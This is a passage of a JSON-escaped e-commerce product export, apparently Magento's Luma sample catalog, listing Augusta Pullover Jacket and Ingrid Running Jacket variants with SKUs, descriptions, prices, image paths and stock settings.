s_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"1205\":{\"sku\":\"WJ03\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Augusta Pullover Jacket\",\"description\":\"<p>It\'s hard to be uncomfortable in the Augusta Pullover Jacket with &frac14; zip. With an incredibly soft fleece lining and textured outer fabric, it offers reliable protection from the elements and a cozy fit as well.<\\/p>\\n<p>&bull; Pink half-zip pullover. <br \\/>&bull; Front pouch pockets. <br \\/>&bull; Fold-down collar.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Jacket|Pullover|Soft Shell|Windbreaker|&frac14; zip,material=Fleece|Polyester,pattern=Solid,climate=All-weather|Cool|Indoor|Mild|Spring,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WJ03-XS-Blue,size=XS,color=Blue|sku=WJ03-XS-Orange,size=XS,color=Orange|sku=WJ03-XS-Red,size=XS,color=Red|sku=WJ03-S-Blue,size=S,color=Blue|sku=WJ03-S-Orange,size=S,color=Orange|sku=WJ03-S-Red,size=S,color=Red|sku=WJ03-M-Blue,size=M,color=Blue|sku=WJ03-M-Orange,size=M,color=Orange|sku=WJ03-M-Red,size=M,color=Red|sku=WJ03-L-Blue,size=L,color=Blue|sku=WJ03-L-Orange,size=L,color=Orange|sku=WJ03-L-Red,size=L,color=Red|sku=WJ03-XL-Blue,size=XL,color=Blue|sku=WJ03-XL-Orange,size=XL,color=Orange|sku=WJ03-XL-Red,size=XL,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj03-red_alt1.jpg,\\/w\\/j\\/wj03-red_back.jpg\",\"image\":\"\\/w\\/j\\/wj03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj03-red_alt1.jpg,\\/w\\/j\\/wj03-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Jacket|Pullover|Soft Shell|Windbreaker|&frac14; zip\",\"material\":\"Fleece|Polyester\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Cool|Indoor|Mild|Spring\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1206\":{\"sku\":\"WJ04-XS-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Ingrid Running Jacket-XS-Orange\",\"description\":\"<p>The Ingrid Running Jacket combines sleek design and high performance with slim, contoured fit and moisture-wicking fabric. It features a full-zip construction and a collared neck to keep the elements out and body heat in. <br \\/>&bull; Slim fit. <br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Two side pockets. <br \\/>&bull; Zippered pocket at back waist. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Ivory specked full zip<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"84\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ingrid-running-jacket-xs-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj04-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj04-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj04-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj04-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj04-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Orange\"},\"1207\":{\"sku\":\"WJ04-XS-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Ingrid Running Jacket-XS-Red\",\"description\":\"<p>The Ingrid Running Jacket combines sleek design and high performance with slim, contoured fit and moisture-wicking fabric. It features a full-zip construction and a collared neck to keep the elements out and body heat in. <br \\/>&bull; Slim fit. <br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Two side pockets. <br \\/>&bull; Zippered pocket at back waist. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Ivory specked full zip<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"84\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ingrid-running-jacket-xs-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj04-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj04-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj04-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj04-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj04-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Red\"},\"1208\":{\"sku\":\"WJ04-XS-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Ingrid Running Jacket-XS-White\",\"description\":\"<p>The Ingrid Running Jacket combines sleek design and high performance with slim, contoured fit and moisture-wicking fabric. It features a full-zip construction and a collared neck to keep the elements out and body heat in. <br \\/>&bull; Slim fit. <br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Two side pockets. <br \\/>&bull; Zippered pocket at back waist. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Ivory specked full zip<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"84\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ingrid-running-jacket-xs-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj04-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj04-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj04-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj04-white_alt1.jpg,\\/w\\/j\\/wj04-white_alternate.jpg,\\/w\\/j\\/wj04-white_back.jpg\",\"image\":\"\\/w\\/j\\/wj04-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj04-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj04-white_alt1.jpg,\\/w\\/j\\/wj04-white_alternate.jpg,\\/w\\/j\\/wj04-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"White\"},\"1209\":{\"sku\":\"WJ04-S-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Ingrid Running Jacket-S-Orange\",\"description\":\"<p>The Ingrid Running Jacket combines sleek design and high performance with slim, contoured fit and moisture-wicking fabric. It features a full-zip construction and a collared neck to keep the elements out and body heat in. <br \\/>&bull; Slim fit. <br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Two side pockets. <br \\/>&bull; Zippered pocket at back waist. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Ivory specked full zip<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"84\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ingrid-running-jacket-s-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj04-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj04-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj04-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj04-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj04-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Orange\"},\"1210\":{\"sku\":\"WJ04-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Ingrid Running Jacket-S-Red\",\"description\":\"<p>The Ingrid Running Jacket combines sleek design and high performance with slim, contoured fit and moisture-wicking fabric. It features a full-zip construction and a collared neck to keep the elements out and body heat in. <br \\/>&bull; Slim fit. <br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Two side pockets. <br \\/>&bull; Zippered pocket at back waist. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Ivory specked full zip<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"84\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ingrid-running-jacket-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj04-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj04-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj04-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj04-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj04-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},\"1211\":{\"sku\":\"WJ04-S-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Ingrid Running Jacket-S-White\",\"description\":\"<p>The Ingrid Running Jacket combines sleek design and high performance with slim, contoured fit and moisture-wicking fabric. It features a full-zip construction and a collared neck to keep the elements out and body heat in. <br \\/>&bull; Slim fit. <br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Two side pockets. <br \\/>&bull; Zippered pocket at back waist. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Ivory specked full zip<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"84\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ingrid-running-jacket-s-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj04-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj04-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj04-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj04-white_alt1.jpg,\\/w\\/j\\/wj04-white_alternate.jpg,\\/w\\/j\\/wj04-white_back.jpg\",\"image\":\"\\/w\\/j\\/wj04-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj04-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj04-white_alt1.jpg,\\/w\\/j\\/wj04-white_alternate.jpg,\\/w\\/j\\/wj04-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"White\"},\"1212\":{\"sku\":\"WJ04-M-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Ingrid Running Jacket-M-Orange\",\"description\":\"<p>The Ingrid Running Jacket combines sleek design and high performance with slim, contoured fit and moisture-wicking fabric. It features a full-zip construction and a collared neck to keep the elements out and body heat in. <br \\/>&bull; Slim fit. <br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Two side pockets. <br \\/>&bull; Zippered pocket at back waist. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Ivory specked full zip<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"84\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ingrid-running-jacket-m-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj04-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj04-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj04-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj04-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj04-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Orange\"},\"1213\":{\"sku\":\"WJ04-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Ingrid Running Jacket-M-Red\",\"description\":\"<p>The Ingrid Running Jacket combines sleek design and high performance with slim, contoured fit and moisture-wicking fabric. It features a full-zip 